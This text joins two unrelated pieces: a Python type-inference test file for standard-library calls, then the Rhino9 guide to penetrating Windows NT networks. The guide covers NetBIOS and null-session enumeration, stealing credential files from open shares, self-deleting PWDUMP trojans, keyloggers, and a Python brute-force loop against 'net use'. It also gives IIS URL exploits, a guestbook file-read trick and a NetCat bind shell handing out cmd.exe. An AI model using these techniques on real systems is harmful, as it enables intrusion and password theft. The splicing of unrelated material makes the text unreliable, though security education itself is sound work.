"""
std library stuff
"""
# -----------------
# builtins
# -----------------
arr = ['']
#? str()
sorted(arr)[0]
#? str()
next(reversed(arr))
next(reversed(arr))
# should not fail if there's no return value.
def yielder():
    yield None
#? None
next(reversed(yielder()))
# empty reversed should not raise an error
#?
next(reversed())
#? str()
next(open(''))
#? int()
{'a':2}.setdefault('a', 3)
# Compiled classes should have the meta class attributes.
#? ['__itemsize__']
tuple.__itemsize__
# -----------------
# type() calls with one parameter
# -----------------
#? int
type(1)
#? int
type(int())
#? type
type(int)
#? type
type(type)
#? list
type([])
def x():
    yield 1
generator = type(x())
#? generator
type(x for x in [])
#? type(x)
type(lambda: x)
import math
import os
#? type(os)
type(math)
class X(): pass
#? type
type(X)
# -----------------
# enumerate
# -----------------
for i, j in enumerate(["as", "ad"]):
    #? int()
    i
    #? str()
    j
# -----------------
# re
# -----------------
import re
c = re.compile(r'a')
# re.compile should not return str -> issue #68
#? []
c.startswith
#? int()
c.match().start()
#? int()
re.match(r'a', 'a').start()
for a in re.finditer('a', 'a'):
#? int()
a.start()
#? str()
re.sub('a', 'a')
# -----------------
# ref
# -----------------
import weakref
#? int()
weakref.proxy(1)
#? weakref.ref()
weakref.ref(1)
#? int()
weakref.ref(1)()
# -----------------
# functools
# -----------------
import functools
basetwo = functools.partial(int, base=2)
#? int()
basetwo()
def function(a, b):
    return a, b
a = functools.partial(function, 0)
#? int()
a('')[0]
#? str()
a('')[1]
kw = functools.partial(function, b=1.0)
tup = kw(1)
#? int()
tup[0]
#? float()
tup[1]
def my_decorator(f):
    @functools.wraps(f)
    def wrapper(*args, **kwds):
        return f(*args, **kwds)
    return wrapper
@my_decorator
def example(a):
    return a
#? str()
example('')
# -----------------
# sqlite3 (#84)
# -----------------
import sqlite3
#? sqlite3.Connection()
con = sqlite3.connect()
#? sqlite3.Cursor()
c = con.cursor()
#? sqlite3.Row()
row = c.fetchall()[0]
#? str()
row.keys()[0]
def huhu(db):
    """
    :type db: sqlite3.Connection
    :param db: the db connection
    """
    #? sqlite3.Connection()
    db
# -----------------
# hashlib
# -----------------
import hashlib
#? ['md5']
hashlib.md5
# -----------------
# copy
# -----------------
import copy
#? int()
copy.deepcopy(1)
#?
copy.copy()
# -----------------
# json
# -----------------
# We don't want any results for json, because it depends on IO.
import json
#?
json.load('asdf')
#?
json.loads('[1]')
# -----------------
# random
# -----------------
import random
class A(object):
    def say(self): pass
class B(object):
    def shout(self): pass
cls = random.choice([A, B])
#? ['say', 'shout']
cls().s
# -----------------
# zipfile
# -----------------
import zipfile
z = zipfile.ZipFile("foo")
# It's too slow. So we don't run it at the moment.
##? ['upper']
z.read('name').upper
This guide, too, is meant to teach penetration of a Windows NT system. It demonstrates several tools that can be used to analyze a system, and what can be avoided in order to keep a system secure.
This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on an NT-based network. The intent of this document is to educate administrators and security professionals about both the mindset of an attacker and a large set of current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "Improving the Security of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema.
Obviously, this text will not contain all known methods for NT network penetration. We have tried to put together a text that Administrators can use to learn basic penetration techniques to test the vulnerability of their own networks. If the concepts and techniques presented in this text are absorbed and understood, an Administrator should have a strong base knowledge of how penetrations occur and should be able to build upon that knowledge to further protect their network.
This file is not meant for people that are new to security or NT or networking technologies. The authors assume that people reading this document have a certain understanding of protocols, server technologies and network architectures.
The authors would like to continue expanding on this document and releasing updated versions of it. We call upon all those who wish to contribute techniques to send detailed information on your own penetration testing methods. We would like to release updates to this document to keep it a current and solid resource. Send your techniques or submissions to: neonsurge@hotmail.com. Valid and useful submissions will be incorporated into the document with proper credit given to the author.
The text is written in a procedural manner. We have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.
The document is divided into 3 sections: NetBIOS, WebServer, and Miscellaneous, each of which explain different methods of information gathering and penetration techniques.
The initial step an intruder would take is to portscan the target machine or network. It's surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine. Intruders learn to view a portscan and tell whether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done. Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.
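The mechanics of such a scan are simple enough to sketch. The following Python fragment (the target address and port list are illustrative assumptions, not values from this text) performs the plain TCP connect scan described above:

    # Minimal TCP connect scan: a port is reported open if connect() succeeds.
    import socket

    def connect_scan(host, ports, timeout=1.0):
        open_ports = []
        for port in ports:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            try:
                s.connect((host, port))   # succeeds only if something is listening
                open_ports.append(port)
            except (socket.timeout, socket.error):
                pass                      # closed or filtered
            finally:
                s.close()
        return open_ports

    # Ports 135 and 139 open (with 22 and 111 closed) strongly suggest NT.
    print(connect_scan('192.0.2.10', [21, 22, 25, 80, 110, 111, 135, 139]))

A scan like this is noisy, and real scanners add timing tricks, but the open-port fingerprint it produces is exactly what the paragraph above describes.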
When attacking an NT based network, NetBIOS tends to take the brunt of an attack. For this reason, NetBIOS will be the first serious topic of discussion in this paper.
The NBTSTAT command can be used to query network machines for NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits. Interpreting the information it returns can reveal more than one might think.
Switches: -a lists the remote computer's name table given its host name. In the name table returned, each NetBIOS name is shown with its last byte converted into hex; this byte identifies the service that registered the name.
Associated: The endpoint for a connection has been created and your computer has associated it with an IP address.
Connected: This is a good state! It means you're connected to the remote resource.
Connecting: Your session is trying to resolve the name-to-IP address mapping of the destination resource.
Disconnected: Your computer requested a disconnect, and it is waiting for the remote computer to do so.
Idle: The remote computer has been opened in the current session, but is currently not accepting connections.
Reconnecting: If your connection failed on the first attempt, it will display this state as it tries to reconnect.
An intruder could use the table above and the output from an nbtstat command run against your machines to begin gathering information about them. With this information an intruder can tell, to an extent, what services are running on the target machine and sometimes what software packages have been installed. Traditionally, every service or major software package comes with its share of vulnerabilities, so this type of information is certainly useful to an intruder.
The next logical step would be to glean possible usernames from the remote machine. A network login consists of two parts, a username and a password. Once an intruder has what he knows to be a valid list of usernames, he has half of several valid logins. Now, using the nbtstat command, the intruder can get the login name of anyone logged on locally at that machine. In the results from the nbtstat command, entries with the <03> identifier are usernames or computernames. Gleaning usernames can also be accomplished through a null IPC session and the SID tools (For more information about the SID tools, read appendix B).
At this point, the intruder knows what services are running on the remote machine, which major software packages have been installed (within limits), and has a list of valid usernames and groups for that machine. Although this may seem like a ton of information for an outsider to have about your network, the null IPC session has opened other avenues for information gathering. The Rhino9 team has been able to retrieve the entire native security policy for the remote machine: such things as account lockout, minimum password length, password age cycling, and password uniqueness settings, as well as every user, the groups they belong to, and the individual domain restrictions for that user - all through a null IPC session. This information-gathering ability will appear in Rhino9's soon-to-be-released Leviathan tool. Some of the tools available now that can be used to gather more information via the IPC null session are discussed below.
The release of the WindowsNT 4.0 Resource Kit made a new set of tools available to both administrator and intruder alike. Below is a description of some of the Resource Kit Utilities that the Rhino9 team has used in conjunction with the IPC$ null session to gather information. When reading these tool descriptions and the information they provide, keep in mind that the null session that is used does NOT provide the remote network with any real credentials.
In order to fully understand what is happening in the capture, let's discuss it. Before the actual attack took place, a mapping was put into the lmhosts file that reflected the Student4 machine and its domain-activity status using the #PRE/#DOM tags (explained in more detail below). The entry was then preloaded into the NetBIOS cache, and a null IPC session was established. As you can see, the command is issued against the Domain name. The tool will then query the Primary Domain Controller for that Domain.
Global: This command-line utility displays the members of global groups on remote servers or domains. As discussed above, this utility is used in conjunction with an Lmhosts/IPC mapping. Shown below is an actual capture of the global tool. In the example, the "Domain Users" is a standard, default global group present in a WindowsNT domain. For this example, we have used the tool to query Domain1 for a listing of all users in the "Domain Users" group.
Local: The Local tool works just as the Global tool does, except it queries the machine for the members of a local group instead of a global group. Below is an example of the Local tool querying a server for a list of its Administrators group.
The computer \\SPUPPY is a domain controller of DOMAIN4.
The computer \\SPUPPY is the PDC of DOMAIN4.
NetWatch: NetWatch is a tool that will give the person invoking the tool a list of the shares on a remote machine. Again, this tool works with an Lmhosts/IPC mapping. The bad thing about this tool is that the Rhino9 team was able to use the tool to retrieve a list of the hidden shares on the remote machine.
Other known penetration techniques that involve the IPC share include opening the registry of the remote machine, as well as a remote User Manager for Domains technique. The IPC null connection could allow an intruder to potentially gain access to your registry. Once the null IPC session has been established, the intruder would launch his local regedit utility and attempt the Connect Network Registry option. If this is successful, the intruder would have read access to certain registry keys, and potentially read/write access. Regardless, even read access to the registry is undesirable from a security standpoint.
An intruder could also attempt the IPC User Manager for Domains technique. This technique is relatively unknown and often produces no results. We are covering it because it can produce results, and it can be an effective intrusion technique. This technique involves a null IPC session and entries in the LMHOSTS file. The LMHOSTS file is (normally) a local file kept on Windows-based machines to map NetBIOS names to IP addresses. Used mostly in non-WINS environments, or on clients unable to use WINS, the LMHOSTS file can actually be used in many different ways by an intruder. Different uses for the LMHOSTS file will be discussed later in this text; for now, we will discuss how the LMHOSTS file is used in this technique.
By examining the results of the nbtstat command, we are looking for the <03> identifier. If someone is logged on locally on the machine, you will see two <03> identifiers. Normally the first <03> listed is the NetBIOS name of the machine, and the second <03> listed is the name of the locally logged-on user. At this point the intruder would put the NetBIOS name and IP address mapping of the machine into his local LMHOSTS file, ending the entry with the #PRE and #DOM tags. The #PRE tag denotes that the entry should be preloaded into the NetBIOS cache. The #DOM tag denotes domain activity. The intruder would then issue an nbtstat -R command to preload the entry into his cache. Technically, this preloading makes the entry appear as if it had been resolved by some previous network function, allowing the name to be resolved much more quickly.
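As an illustration (the name, domain, and address are invented, reusing the fictional address that appears elsewhere in this text), the intruder's LMHOSTS entry and cache preload would look like this:

    131.107.2.200    STUDENT4    #PRE    #DOM:DOMAIN1

    C:\> nbtstat -R

The -R switch purges the local NetBIOS name cache and reloads every #PRE entry from LMHOSTS.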
Next the intruder would establish a null IPC session. Once the null IPC session has been successfully established, the intruder would launch his local copy of User Manager for Domains and use the Select Domain function in User Manager. The Domain of the remote machine will appear (or can be typed in manually) because it has been preloaded into the cache. If the security of the remote machine is lax, User Manager will display a list of all the users on the remote machine. If this is being done over a slow link (i.e., a 28.8 modem), it will normally not work. On faster network connections, however, this tends to produce results.
Now that the intruder has gathered information about your machine, the next step would be to actually attempt a penetration of that machine. The first penetration technique to be discussed will be the open file share attack. The intruder would couple the previously discussed net view command with a net use command to accomplish this attack.
Taking the net view from above, let's discuss the attack.
This attack will only work if the share is unpassworded or shared out to the Everyone group (NOTE: the Everyone group means everyone. If someone connects as a null user, they are now part of the Everyone group.). If those parameters are in place, the attacker would be able to map a network drive to your machine and begin what could amount to a severe series of penetration attacks. Keep in mind that the intruder is not limited to mapping drives to the shares displayed by the net view command. An intruder who knows NT or has done his homework knows that NT has hidden administrative shares. By default, NT creates the IPC$ share and one hidden share for every drive on the machine (i.e., a machine that has C, D, and E drives would have corresponding hidden shares of C$, D$, and E$). There is also a hidden ADMIN$ share that maps directly to the installation path of NT itself (i.e., if you installed NT in C:\winnt, then ADMIN$ maps to exactly that directory). One thing that the Rhino9 team has noticed about the majority of the NT security community is that they seem to be oblivious to the concept of penetrating one internal NT machine from another internal NT machine. The Rhino9 team, during our professional audits, has accomplished this task many times. Chances are, if the intruder is good and can gain access to one of your machines, he will worm his way into the rest of your network. For that reason, these share attacks can pose a serious threat.
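As an illustration (the address, drive letter, and share are assumptions), mapping a drive to one of those hidden administrative shares is a single command:

    C:\> net use X: \\131.107.2.200\C$

If the share is unpassworded or open to Everyone, drive X: now maps directly onto the target's C drive.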
At first, one may not see the dangers of an outsider having access to your hard drive. Access to the hard drive opens up new avenues for information gathering and trojan/virus planting. An attacker would normally look for something that could possibly contain a password or highly sensitive data that he could use to continue digging his way into your network. Some of the files that an intruder will look for and use are listed below, each with a brief description of what it is and how it would be used.
Eudora.ini: This file is used to store configuration information for the Eudora e-mail software. An easily obtainable tool called eudpass.com will extract the individual's username and password information, as well as all the information the attacker needs to begin eavesdropping on the user's mail. At this point, the intruder could configure his own e-mail software to read the target's mail. Again, some could have a hard time seeing the dangers in this, but remember that people are generally creatures of habit. The chances that the user's e-mail password is the same password they use to log into the network at work are relatively high. Now all the attacker needs to do is keep snooping around on the user's hard drive for a resume or some other work-related document to point him in the direction of the person's place of business, allowing him to launch a somewhat strong initial strike against that network.
Tree.dat: This is the file used by the popular software CuteFTP to store the user's FTP site/username/password combinations. Using a program called FireFTP, the attacker can easily crack the tree.dat file. So, as above, the attacker could keep gathering information and launch an attack against your place of business. Not to mention that if you have an FTP mapping in your tree.dat that maps directly to your place of business, his attack has now become much easier.
PWL: PWL's generally reside on Win95 machines. They are used to store operation specific passwords for the Windows95 end user. A tool called glide.exe will crack (with less than desirable efficiency) PWL files. There is also documentation available on how to manually crack the encryption of these PWL files using a calculator. Continuing the scenario, the attacker could keep gathering information about the user and formulate an attack.
PWD: PWD files exist on machines running FrontPage or Personal Webserver. These files include the plain text username and an encrypted password matching the credentials needed to administer the website. The encryption scheme used for these passwords is the standard DES scheme. Needless to say, many DES cracking utilities are available on the internet. John the Ripper by Solar Designer very efficiently cracks these passwords.
IDC Files: IDC (Internet Database Connector) files are normally used for back-end connectivity to databases from a webserver. Because this type of connection generally requires authentication, some IDC files contain username/password combinations, often in clear text.
waruser.dat: This is one of the config files for WarFTP, the popular Win32 FTP server. This particular dat file could contain the administrative password for the FTP server itself. From what the authors have been able to find out, this only occurs in beta versions of WarFTP 1.70.
$winnt$.inf: During an unattended installation of WindowsNT, the setup process requires information files. As residue of this unattended installation process, a file called $winnt$.inf could exist in the %systemroot%\system32 directory. This file could contain the username and password combination of the account that was used during the installation. Because the account used in these types of installations normally requires some strong permission sets on the network, this is not a trivial matter.
Sam._: Although people have known for a long time that the SAM database could present a problem if it fell into the wrong hands, many people forget about the sam._. Many would-be intruders have asked themselves how they could copy the SAM database once they could mount a drive across the net. Normally this is not possible, because the NT server you are connected to is running, and while it is running, it locks the SAM. However, if the administrator has created an emergency repair disk, a copy of the SAM should be located in the %systemroot%\repair\ directory. This file will be named sam._. This copy, by default, is readable by Everyone. By using a copy of the samdump utility, you can dump username/password combinations from the copied SAM.
Needless to say, the file contains information that an intruder could easily use to further compromise the integrity of your network.
Profile.tfm: Profile.tfm is a file created by the POP3 client software AcornMail. At the writing of this document, AcornMail had begun getting a lot of attention from the internet community. Upon inspection of the software, we found that it is an efficient POP3 client, but the installation is not NTFS-friendly. After installing the software, we began to check the files that AcornMail created. We found that the Profile.tfm file held the username/password combination. At first, we decided the software was somewhat acceptable, because it did indeed store the password in an encrypted state. We then realized that the permissions on the profile.tfm file were set to Everyone/Full Control. This causes problems because anyone could obtain a copy of the file and plug it into their own AcornMail installation. The intruder could then log on with the stored information. Below is a capture in Network Monitor of just that.
00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg.........E.
00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...n.D.....2Q.P.
00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.for.
00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg...E.
00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .S.D.n.2Q.....P.
00000040 37 33 0D 0A 63..
As you can see, the username/password is indeed passed in clear text. This is not a fault of AcornMail, but something that has been present in every version of the POP protocol. This data-file swapping/packet-sniffing type of technique has been tested by the Rhino9 team on numerous software titles, so this attack is not limited to AcornMail.
Now that we have discussed the files an intruder may wish to acquire if he gains access to your hard drive, let's discuss trojan planting. If there is one thing that can gain an attacker a ton of information, it is trojan planting. The open file share attack generally makes trojan planting extremely easy to do. One of the easiest and most informative trojans to use is the PWDUMP utility wrapped in a batch file. If prepared correctly, the batch file will execute minimized (also named something clever, such as viruscan.cmd), run the PWDUMP utility, delete the PWDUMP utility after it has run its course, and finally erase itself. This generally leaves little evidence and creates a nice text file of all of the username/password combinations on that machine.
Rules of the trick: the target must be an NT machine and the end user executing the trojan must be the administrator, so the attacker drops the batch file into the Administrator's start-up folder and waits. The next time the Administrator logs in to the machine, the batch file executes and dumps the username/password combinations. Then the attacker connects back into the machine via file sharing and collects the results.
Another solid attack an intruder might try is to place a keylogger batch into the start-up folder. This can usually be done to any user, not just the administrator. This will glean all keystrokes issued by that user, minus initial logon credentials (due to the NT architecture, which stops all user mode processes during login). The attacker then connects back to the target machine at a later time and collects the recorded keystrokes.
One of the deadliest trojan attacks is a batch file that runs as Administrator and sets up a scheduled event using the AT command. Because the AT command can execute as SYSTEM, it can create copies of the SAM database and the registry. Imagine the fun an attacker can have with that one.
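As an illustration (the time is arbitrary, and rdisk /s- is one way to produce the SAM copy mentioned above), the scheduled event could be as simple as:

    C:\> at 02:00 "rdisk /s-"

Scheduled this way, rdisk runs in the SYSTEM context and silently refreshes %systemroot%\repair, leaving behind a fresh sam._ for the attacker to collect over the share.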
How does one prevent such attacks? By not sharing items to the Everyone group, and by enforcing strong password schemes in your environment. If an intruder comes across a server that prompts him for credentials at every turn, chances are the intruder will become frustrated and leave. Other, more persistent intruders will continue on with a brute force attack.
Undoubtedly the most common tool for brute force NetBIOS attacks is NAT. The NAT (NetBIOS Auditing Tool) tool allows a user to automate network connection commands using a list of possible usernames and passwords. NAT will attempt to connect to the remote machine using every username and every password in the lists provided. This can be a lengthy process, but often an attacker will use a shortened list of common passwords and call it quits. An accomplished intruder will construct his list of usernames using the information-gathering techniques discussed above. The password list the intruder uses will also be constructed from gleaned information, starting with a bare-bones list of passwords and creating the rest based on the usernames. It comes as no surprise to security professionals to find passwords set to the username.
An attacker can specify a single IP address to attack, or an entire range of IP addresses. NAT will diligently work to accomplish the task, all the while generating a formatted report.
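For the curious, the core of what NAT automates can be sketched in a few lines of Python driving the standard net use command (the host and word lists are illustrative assumptions; NAT itself handles share enumeration, timeouts, and reporting far more thoroughly, and this only runs on a Windows machine):

    # Try every username/password pair against the target's IPC$ share.
    import subprocess

    host = '131.107.2.200'
    usernames = ['administrator', 'backup', 'guest']
    passwords = ['', 'password', 'administrator', 'backup']

    for user in usernames:
        for pw in passwords:
            cmd = ['net', 'use', '\\\\%s\\ipc$' % host, pw, '/user:%s' % user]
            if subprocess.call(cmd) == 0:      # exit code 0 means the logon worked
                print('CONNECTED: %s / %s' % (user, pw))
                subprocess.call(['net', 'use', '\\\\%s\\ipc$' % host, '/delete'])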
Below is an actual results file of a real NAT attack across the internet. Although permission was given for the Rhino9 team to perform this attack, the IP address has been changed to protect the test target.
If you look closely at the results, you can clearly see the CONNECTED message which informs the attacker that the tool found a valid Username/Password combination. At this point, the intruder would just manually re-connect to that machine using the newly found username/password combination and launch his attack.
This is the end of the remote penetration via NetBIOS section. Keep in mind that the techniques discussed above are neither static nor stand-alone. An intruder who has spent time learning how to penetrate NT based networks will become extremely creative and use not only the techniques above, but personal variations of those techniques.
Information gathering and remote penetration via a webserver are well known today due to the population explosion on the internet and the resulting dissemination of information. When discussing remote penetration and information gathering on NT webservers, we will focus on Internet Information Server, the webserver that comes bundled with NT4.
Some of the information to be discussed will be somewhat outdated. We have included it due to the fact that during professional audits, the Rhino9 Team has come across companies that are still running older versions of software titles in their production environments.
Let's begin by discussing information-gathering techniques. We will discuss ways of getting information about the webserver under attack, as well as using the webserver to get information that could be used in other types of attacks.
First we will discuss how one would retrieve the webserver software package and version on the target machine. Someone new to the security community might wonder why one would want the webserver version of the target machine. Every version and distribution of software has different vulnerabilities attached to it. For this reason, an intruder would want to know the webserver software and version in question.
The oldest technique used to acquire webserver software and version is to telnet to the target machine on the HTTP port. Once a telnet connection has been established, issuing a simple GET command would allow one to view the HTTP header information, which would include the webserver software and version being used.
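Reproducing this by hand is trivial; here is the same banner grab as a short Python sketch (the hostname is an illustrative assumption):

    # Connect to port 80 and read the HTTP header block the server returns.
    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('www.example.com', 80))
    s.send(b'HEAD / HTTP/1.0\r\n\r\n')    # HEAD keeps the output short; GET works too
    response = s.recv(4096)
    s.close()

    # The Server: header names the package, e.g. "Server: Microsoft-IIS/3.0"
    print(response.decode('latin-1'))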
One who is not prone to using telnet, or does not wish to parse through the header information, can use a couple of available tools. The first, and probably the most popular tool amongst non-accomplished intruders, is Netcraft. An intruder can visit www.netcraft.com and use their query engine to retrieve the webserver information from the remote target. Netcraft can also be used to retrieve all known webserver hostnames. For example, if we wanted to find all of the webservers that belong to the someserver.com domain, we could use Netcraft's engine to query *.someserver.com, and it would return a listing of all of the webserver hosts in that domain. Other tools that can be used to retrieve the webserver version include 1nf0ze by su1d and Grinder by horizon of Rhino9 (URLs to all tools discussed in this text can be found at the end of this document).
Once the intruder has determined what webserver package he is up against, he can begin to formulate an attack plan. By using the techniques discussed below, the intruder could gain access to the server or gain information from the server to use in other attacks. Understand that this section is in no way a complete representation of all attacks, just the more common and well known ones.
The .bat and .cmd bug is a well-known bug in the Netscape server, described in Q59 of the WWW Security FAQ. The Internet Information Server implementation of this bug beats all scores:
1) The IIS web server allows a hacker to execute his "batch file" as a chain of commands embedded in the URL, i.e., more than a single command can be executed.
2) When the batch file is invoked this way (COMMAND1 through COMMAND[N]), nothing will be logged by the IIS web server.
3) The IIS web server maps the .bat and .cmd extensions to cmd.exe.
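A reconstructed example of such a request (the host, script name, and command are assumptions based on the general form of the original advisory):

    http://www.target.com/scripts/fancy.bat?&dir+c:\

Everything after the ? ends up on a cmd.exe command line, and further commands can be chained onto the same request, which is why more than one command can be executed in a single unlogged hit.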
If you are having trouble seeing exactly what is going on in this situation, an intruder could use the above attack sequence to create and execute files server side. This could have really drastic results depending on the skill level and intent of the attacker. Luckily, most production environments are no longer running versions of Internet Information Server old enough to still be affected by this flaw.
WindowsNT installations of Internet Information Server require some type of account on the box to be used for authenticating public visits. If this account were not present in some fashion, every visitor to the site would be required to present credentials. That would not be a very effective or efficient way to run a public website. On Internet Information Server, the account used is the IUSR_<computername> account. This account and its accompanying password are created during installation. By default, this account is a member of the Everyone group, and by default the Everyone group has read access to everything on an NT drive. This fact, coupled with the above-mentioned flaw's ability to break out of the webroot, could lead to major security breaches.
When this flaw first appeared, many people in the community ignored it and gave it no serious thought. Soon after, a public release was made documenting the exact steps an intruder would take to obtain a copy of the repair SAM. The release included the above URL flaw as part of its overall attack.
When Microsoft released Internet Information Server 3.0, it brought active server page technology to the world. This release also opened the gates to a new stream of flaws that affected IIS and NT4.
Active server pages brought simple, dynamic webpages to the Microsoft world. Active Server Pages can be used in many different ways, such as database connectivity, indexing and searching documents, authentication, and simple graphics rotation for those annoying advertisement banners.
The concept of active server pages was actually pretty creative. The HTML code would include imbedded script code that would execute server side and produce dynamic content for the end user. With this new technology widely available, it was not long until the first flaw was released to the public. This first flaw, dubbed the 'dot flaw', would allow an intruder to actually view the script without the server executing it.
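The attack was as simple as requesting the page with a trailing period appended to the URL (the hostname and page are illustrative):

    http://www.target.com/default.asp.

The trailing dot kept IIS from recognizing the .asp extension, so the file was served as plain text instead of being executed.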
This attack would display the unexecuted code in the attacker's web browser. Needless to say, the script code could contain sensitive information, such as a username/password combination used to remotely connect to a database. This type of information, among other things, is not something that one would want an intruder getting their hands on.
Everyone involved in the security community suspects that these will not be the last script-revealing methods to emerge. As these scripts become more and more commonplace, they will contain more and more sensitive information. These simple exploits could lead to an intruder easily gleaning sensitive information.
When it comes to gleaning information from IIS, perhaps one of the most popular and easiest of the attacks is the Index Server attack. Index Server is a small, compact search engine module that was included with Internet Information Server version 3.0. This module gives webmasters the ability to provide visitors to their site with an interface for searching the contents of the website. Although there are no inherent problems with Index Server itself, problems arise out of a lack of education on the part of the admin or webmaster. Index Server is not difficult to understand, set up, and maintain, although its use of catalogs and scopes can lead to an admin misconfiguring the permissions and searchable content. This misconfiguration could lead to an intruder gaining access to information he would normally have a much more difficult time getting.
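For example, an intruder could feed the site's search form a query restriction such as the following (the exact syntax depends on how the search form passes its restriction; this form is illustrative):

    #filename=*.pwd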
This would instruct Index Server to search through its catalog of indexed data for any files ending with that file extension. Keep in mind that this file extension is not limited to extensions that Index Server understands. If Index Server encounters a file type it does not understand, it will treat it as a binary and index the filename, extension, date, and other attributes. This means that an intruder could search for anything, including *._, which could bring up the repair SAM. The interesting thing about Index Server is that, unlike full-blown internet search engines, Index Server will not display a file the requester does not have permission to access. In other words, if Index Server returns the fact that it found a file, then the file is accessible.
If the admin has somehow misconfigured the permissions on this interface, then an intruder could gain unauthorized access to the web server with administrative functions. If successful, the intruder would be presented with an HTML interface to an administrative tool. Because of the way IIS and NT handle permissions, it is possible for the intruder to gain access to the interface but not have the proper permissions to actually do anything with it. So if you are auditing your own network, be sure to attempt a minor change to ensure that there really is a problem.
In late '97 and early '98 an enormous number of webserver hacks were performed. A large number of those hacks had one thing in common: the webservers were running Microsoft Frontpage Extensions. Frontpage Extensions are little 'web bots', if you will, that allow the author or administrator of the website to perform complex or involved tasks with relative ease.
The problem with the Frontpage Extensions was that a default Frontpage installation was not secure, especially in the Unix version. An alarming number of the servers supporting these extensions had been left unpassworded, or had administrative rights granted to the Everyone group. Again, the Everyone group means everyone, including anonymous connections.
We will dive into the first Frontpage attack with a discussion of an attack using the actual Frontpage client software.
If the server is unpassworded or if permission is granted to the everyone group, Frontpage will open the remote site for you, and allow you to alter it. The attack really is this simple. If the extensions are set up correctly, a username/password dialogue would appear. The intruder may attempt some basic combinations such as administrator/password, but chances are the intruder won't bother, and will move on.
An intruder could also use the same "open frontpage web" trick to get a complete user listing, which could be used in brute force attacks later. Documentation circulated explaining that to stop the gleaning of usernames this way, one should create a restriction group named FP_www.yourdomain.com:80. This new restriction group indeed works, unless the intruder uses the IP address of your server instead of the domain name.
Although the Frontpage password file is encrypted, it is encrypted with standard DES, so any DES cracker can break it after proper file doctoring. An intruder may also poke around the other _vti directories, as these can sometimes hold sensitive information. After the username is known and the password has been cracked, the intruder could re-connect with his copy of Frontpage and provide it with the credentials, or the credentials could be used in other ways, such as mapping a network drive, provided the same username/password combination works in that context.
The server will then be more than happy to execute the file for the visitor of the site.
It may seem as though there could be countless variants of the same attack type that could issue similar results. Sadly enough, that is a somewhat accurate statement. Many of these flaws are found by people playing with variants of previous flaws, but not all flaws affecting NT web services come from Internet Information Server.
There are other web server software packages that will run on NT, like the well-known Apache web server. Of course, with these third-party web server packages and separately released scripts that run on them, new flaws are bound to show up.
Webcom Datakommunikation released a cgi script that would allow visitors of a website to sign a guestbook. The name of the cgi script is wguest.exe. By issuing the proper commands, this little cgi script allows an attacker to view any text file on your server.
Template.htm here is the file that will be displayed by wguest.exe after the user has entered his information. To exploit this, an attacker views the source, saves the document to his desktop, and edits this line, changing the path to whatever file he wants to view, e.g.:
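    <input type=hidden name=template value=c:\inetpub\wwwroot\template.htm>

changed to something like

    <input type=hidden name=template value=c:\winnt\repair\setup.log>

(The field name and both paths here are assumptions for illustration; the point is that the hidden path is entirely under the visitor's control.)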
He then clicks "Submit", and wguest.exe displays the file. This was not tested with PWL files. Note, however, that the attacker must know the exact path of the file he wishes to view.
The next small item in this section has to do with Netscape Enterprise Server. Some versions of the software react to the ?PageServices parameter by allowing users access to a directory listing. http://www.site.net/?PageServices is how this would be done.
Finally, a word on FTP. FTP can be a secure thing. Tons of people will argue that platform and version dependency make it more secure, and for the most part this is true. But most seasoned security professionals will tell you that version and platform do not amount to anything without an educated admin behind them. We are adding this quick note due to the number of servers Rhino9 has been able to penetrate based on FTP permissions. Some admins will not notice, or understand, the "Anonymous world writable" privs on their webserver. Rhino9 has questioned and worked its way into an entire network via one misconfigured FTP server.
It is not difficult to upload NetCat to a server via an anonymous-writable FTP share, execute it via URL, and bind it to a port. From that point on, you have a remote 'shell' on the NT box. When connecting to that remote NetCat bind, keep in mind that all command-line functions issued from that shell appear to come from the server itself, with the NetCat binding running in the context of an internal user.
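As an illustration (the port number and hostname are arbitrary choices), the classic NetCat binding and the connection to it look like this:

    C:\> nc -l -p 1234 -e cmd.exe      (on the target: listen on 1234, hand connections to cmd.exe)
    C:\> nc www.target.com 1234        (from anywhere: connect and receive the remote shell)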
At this prompt, you could issue a separate telnet command or take advantage of WinGate's SOCKS ability to establish other connections. While the developer of this software product was quick to release fixes and bulletins for this, the next release also had problems.
Alternatively, the intruder would get a listing of the WinGate machine's hard drive. Keep in mind that this is a default install, and it can easily be fixed by changing the default install configuration.
Create a user xyz on your NT domain with an Exchange 5.0 server with POP3 service. Set xyz's password to a1234. Things work fine so far. Now change xyz's password to b5678. You will find that POP3 mail clients can log in using either password a1234 or b5678 for user xyz. Now change the password to something else. You will find that a POP3 client (or direct telnet to port 110) will allow you to log in as xyz using any of the three passwords. They all work. The Exchange 5.0 service POP3 connector caches passwords in a non-hashing mechanism so that all the passwords remain active. This does not affect the new web page interface to get your mail which uses a different authentication. Nor does it affect NT logons. In non-POP3 logins, the passwords are not cached (except NNTP and LDAP). As you can see, the caching problem can be very serious in certain environments.
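The caching behaviour is easy to demonstrate with a short Python sketch using the standard poplib module (the hostname is an assumption; the account and passwords are the example values from the text):

    # Each superseded password should fail; against the flawed connector they all work.
    import poplib

    def pop3_login_works(host, user, password):
        try:
            conn = poplib.POP3(host)
            conn.user(user)
            conn.pass_(password)       # raises poplib.error_proto on a bad password
            conn.quit()
            return True
        except poplib.error_proto:
            return False

    for pw in ['a1234', 'b5678', 'c9999']:
        print(pw, pop3_login_works('mail.example.com', 'xyz', pw))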
On some mail systems, the intruder would be required to go through the HELO sequence first, but this is extremely trivial. Needless to say, this could lead to an intruder gathering a list of valid usernames to use in other attacks.
